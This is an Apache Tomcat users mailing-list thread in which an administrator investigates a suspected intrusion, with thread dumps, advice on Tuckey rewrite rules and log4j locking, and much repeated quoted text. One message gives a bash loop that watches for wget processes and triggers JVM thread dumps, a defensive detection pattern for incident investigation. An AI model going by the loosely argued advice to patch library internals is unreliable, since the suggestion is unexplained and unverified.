> runnable [0x0000000046f34000]
> java.lang.Thread.State: RUNNABLE
> at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
> at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
> at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
> at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
> at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
> at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
> at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
> at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
> at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
> at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
> at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
> MG>DEMASIADO!
> MG>necesita cambiar match-type desde regex at wildcard en Tuckey
> .\WEB-INF\urlrewrite.xml...por ejemplo
> <!-- regex no es necessario -->
> <!-- rule match-type="regex">
> <name>BasicRule</name>
> <from>basicfrom</from>
> <to>basicto</to>
> </rule -->
> <rule match-type="wildcard">
> <name>BasicRule</name>
> <from>basicfrom</from>
> <to>basicto</to>
> </rule>
> MG>puedes ver que nombre, desde y a son los mismos
>
> MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
> "http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d
> waiting on condition [0x000000004ad9b000]
> java.lang.Thread.State: RUNNABLE
> at java.util.Vector.addElement(Vector.java:572)
> - locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
> at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
> at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
> - locked <0x00000006e0303d80> (a java.util.Hashtable)
>
> MG>necessita mata el proceso o cambia proceso lento ...(log4j
> updateParents) por ejemplo en log4j
> package org.apache.log4j;
> public class Hierarchy implements org.apache.log4j.spi.LoggerFactory,
> org.apache.log4j.spi.RendererSupport{
> private org.apache.log4j.spi.LoggerFactory defaultFactory;
> private java.util.Vector listeners;
> // Hashtable ht;
> java.util.ConcurrentHashMap<String,ProvisionNode> ht=new
> java.util.ConcurrentHashMap<String,ProvisionNode>();
>
> //mucho mas tarde
> public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory
> factory) {
> {
> ....
> } else if (o instanceof org.apache.log4j.ProvisionNode) {
> //System.out.println("("+name+") ht.get(this) returned ProvisionNode");
> logger = factory.makeNewLoggerInstance(name);
> logger.setHierarchy(this);
> ht.put(key, logger);
> updateChildren((ProvisionNode) o, logger);
> updateParents(logger);
> return logger;
> }
>
>
> http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
> MG>Entiendes?
> MG>Martín
>
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> >
> >
> >
> > 2014-05-05 13:06 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net
> > >:
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA256
> > >
> > > Leonardo,
> > >
> > > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > > Ok, again its uploaded.
> > > >
> > > > This is the link
> > > >
> > > >
> > >
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> > >
> > > 1/2
> > > >
> > > GiB log file? Hrm.
> > >
> > > It doesn't even have any calls to Runtime.exec in it. If you have a
> > > snapshot of a thread dump (and only the thread dump, I don't need 3
> > > weeks of your logs) that you took while the "intrusion" was taking
> > > place, post that.
> > >
> > > If you don't, then I think you're out of luck.
> > >
> > > Sounds like a bad time to go on holiday.
> > >
> > > - -chris
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: GnuPG v1
> > > Comment: GPGTools - http://gpgtools.org
> > > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> > >
> > > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > > EcwrNcX2iZ+JXXtSTnzH
> > > =nxGK
> > > -----END PGP SIGNATURE-----
> > >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> > > For additional commands, e-mail: users-help@tomcat.apache.org
> > >
> > >
>
>
RE: Regarding i think an intrusion
Posted by Martin Gainty <mg...@hotmail.com>.
> Subject: Re: Regarding i think an intrusion
> From: lsantagostini@gmail.com
> To: users@tomcat.apache.org
>
> Hello Chris, but this logfile was only one day.
MG>Ay Caramba!
>
> Maybe i had a concept mismatch trying to capture the exact moment when the
> execution begins.
>
> My command was
>
> while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
> "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
> java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
> corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
>
> Maybe too many dumps all togheter, now im trying to get a "live" capture
> without luck =(
>
> If you know a better method, please letme know it.
>
> Thanks for your effort, knid regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
MG>Tomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora)
MG>esto
"ContainerBackgroundProcessor[StandardEngine[Catalina]]" daemon prio=10 tid=0x0000000052867800 nid=0x2550 waiting on condition [0x000000004105e000]
java.lang.Thread.State: TIMED_WAITING (sleeping)
at java.lang.Thread.sleep(Native Method)
at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508)
at java.lang.Thread.run(Thread.java:662)
MG>Estos registros informativos producen MUCHO ruido
MG>log4j.properties
MG>log4j.logger.org.quartz=OFF //(Callate Quartz)
MG>eso
"ajp-bio-8009-exec-37" daemon prio=10 tid=0x00002aaac07fd800 nid=0x2656 runnable [0x0000000046f34000]
java.lang.Thread.State: RUNNABLE
at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763)
at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3770)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4295)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.match(Pattern.java:4282)
at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$Loop.matchInit(Pattern.java:4311)
at java.util.regex.Pattern$Prolog.match(Pattern.java:4251)
at java.util.regex.Pattern$Branch.match(Pattern.java:4114)
at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168)
at java.util.regex.Pattern$BmpCharProperty.match(Pattern.java:3366)
at java.util.regex.Pattern$Curly.match0(Pattern.java:3782)
at java.util.regex.Pattern$Curly.match(Pattern.java:3744)
at java.util.regex.Pattern$SliceI.match(Pattern.java:3507)
at java.util.regex.Pattern$Begin.match(Pattern.java:3120)
MG>DEMASIADO!
MG>necesita cambiar match-type desde regex at wildcard en Tuckey .\WEB-INF\urlrewrite.xml...por ejemplo
<!-- regex no es necessario -->
<!-- rule match-type="regex">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule -->
<rule match-type="wildcard">
<name>BasicRule</name>
<from>basicfrom</from>
<to>basicto</to>
</rule>
MG>puedes ver que nombre, desde y a son los mismos
MG>Cada vez que veas 'Runnable' y 'locked' (por ejemplo)
"http-bio-8080-exec-28" daemon prio=10 tid=0x0000000044c5f800 nid=0xe9d waiting on condition [0x000000004ad9b000]
java.lang.Thread.State: RUNNABLE
at java.util.Vector.addElement(Vector.java:572)
- locked <0x00000006e031b010> (a org.apache.log4j.ProvisionNode)
at org.apache.log4j.Hierarchy.updateParents(Hierarchy.java:509)
at org.apache.log4j.Hierarchy.getLogger(Hierarchy.java:273)
- locked <0x00000006e0303d80> (a java.util.Hashtable)
MG>necessita mata el proceso o cambia proceso lento ...(log4j updateParents) por ejemplo en log4j
package org.apache.log4j;
public class Hierarchy implements org.apache.log4j.spi.LoggerFactory, org.apache.log4j.spi.RendererSupport{
private org.apache.log4j.spi.LoggerFactory defaultFactory;
private java.util.Vector listeners;
// Hashtable ht;
java.util.ConcurrentHashMap<String,ProvisionNode> ht=new java.util.ConcurrentHashMap<String,ProvisionNode>();
//mucho mas tarde
public Logger getLogger(String name, org.apache.log4j.spi.LoggerFactory factory) {
{
....
} else if (o instanceof org.apache.log4j.ProvisionNode) {
//System.out.println("("+name+") ht.get(this) returned ProvisionNode");
logger = factory.makeNewLoggerInstance(name);
logger.setHierarchy(this);
ht.put(key, logger);
updateChildren((ProvisionNode) o, logger);
updateParents(logger);
return logger;
}
http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ConcurrentHashMap.html
MG>Entiendes?
MG>Martín
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-05 13:06 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
> >:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA256
> >
> > Leonardo,
> >
> > On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > > Ok, again its uploaded.
> > >
> > > This is the link
> > >
> > >
> > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
> >
> > 1/2
> > >
> > GiB log file? Hrm.
> >
> > It doesn't even have any calls to Runtime.exec in it. If you have a
> > snapshot of a thread dump (and only the thread dump, I don't need 3
> > weeks of your logs) that you took while the "intrusion" was taking
> > place, post that.
> >
> > If you don't, then I think you're out of luck.
> >
> > Sounds like a bad time to go on holiday.
> >
> > - -chris
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1
> > Comment: GPGTools - http://gpgtools.org
> > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
> >
> > iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> > Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> > TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> > IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> > mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> > Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> > az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> > Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> > kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> > tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> > 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> > EcwrNcX2iZ+JXXtSTnzH
> > =nxGK
> > -----END PGP SIGNATURE-----
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> > For additional commands, e-mail: users-help@tomcat.apache.org
> >
> >
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Chris, but this logfile was only one day.
Maybe i had a concept mismatch trying to capture the exact moment when the
execution begins.
My command was
while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v
"127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep
java | grep -v grep | awk '{ print $2 }'); echo -e "Se encontro wget
corriendo, sacando dump de JVM..." ; kill -3 $PIDJAVA; fi; sleep 3; done
Maybe too many dumps all togheter, now im trying to get a "live" capture
without luck =(
If you know a better method, please letme know it.
Thanks for your effort, knid regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 13:06 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> > Ok, again its uploaded.
> >
> > This is the link
> >
> >
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
>
> 1/2
> >
> GiB log file? Hrm.
>
> It doesn't even have any calls to Runtime.exec in it. If you have a
> snapshot of a thread dump (and only the thread dump, I don't need 3
> weeks of your logs) that you took while the "intrusion" was taking
> place, post that.
>
> If you don't, then I think you're out of luck.
>
> Sounds like a bad time to go on holiday.
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
> Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
> TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
> IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
> mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
> Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
> az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
> Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
> kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
> tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
> 0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
> EcwrNcX2iZ+JXXtSTnzH
> =nxGK
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 5/5/14, 11:12 AM, Leonardo Santagostini wrote:
> Ok, again its uploaded.
>
> This is the link
>
> https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
1/2
>
GiB log file? Hrm.
It doesn't even have any calls to Runtime.exec in it. If you have a
snapshot of a thread dump (and only the thread dump, I don't need 3
weeks of your logs) that you took while the "intrusion" was taking
place, post that.
If you don't, then I think you're out of luck.
Sounds like a bad time to go on holiday.
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTZ7cEAAoJEBzwKT+lPKRYg0cP/1KH8lflN/Gdt8KJPJsOvmrs
Jqok5NA6CsYZhI9AjxiCzK54O+HRrv8qpy9oyk1l4yCv7ims3Zd6PI6YmMmMjYbO
TQiJ0ufWNI4mGj9WesHWPtFsSRsKfkhISXfKhdi3jO4p+uH03SkFivGMrKzRqkX/
IKVRV6lh2we3RFY/D/Vb0ptC/lSoy04tSI1H9IYJARI0DDh2tbVtJI1GvTp+qFch
mm4/FTEh6a8XrE09EUvfyeFZKx5anEw0ybo0tU3TQHY76yOKHdP+ySjYBVGbjOx3
Ma38x1OqWBhwlfBlQbbHWl+QHbC7WhR4KHo+Aif+gQIF+DDgMURaRkJZepSzCUCt
az6CKVllIErzN5eimwJxRYGFTDCn/3aRw/0Pvy7WIuReiqhaJh16PdUJCXAX8w/m
Vxf+3rCziAgcTlVHJzDepQVnSOG5XYWpVNTdTwMwrKw1dWIQC9Iya8gK8R2Ynzpt
kzeANOyhJE9fsmVpTxv5mx4CJuai/jF66BI92oBRnVOqr5sfAhzpstR59Njzw0H8
tHPF/XfhII1AEeLJpCiFw7PgO/zLtu6R0Z6mXnuC3vNJ0HesWaumRhqzPy9of+m/
0FBZ5rMdPOrMY9vtnCUjTOzRWxlm0qQHI7g1UqmawtRZNuv47rkTPD92MubzAlSB
EcwrNcX2iZ+JXXtSTnzH
=nxGK
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Ok, again its uploaded.
This is the link
https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing
Kind regards !,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 11:57 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Leonardo,
>
> On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> > Well thread dump is here
> >
> >
> https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
>
> Seems
> >
> like it's broken.
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i
> YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd
> zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ
> q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o
> TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU
> 8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz
> 6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP
> 9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k
> z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt
> klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK
> a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz
> /V2lPhNpr08bYy+s2pkN
> =4tjy
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> Well thread dump is here
>
> https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Seems
>
like it's broken.
- -chris
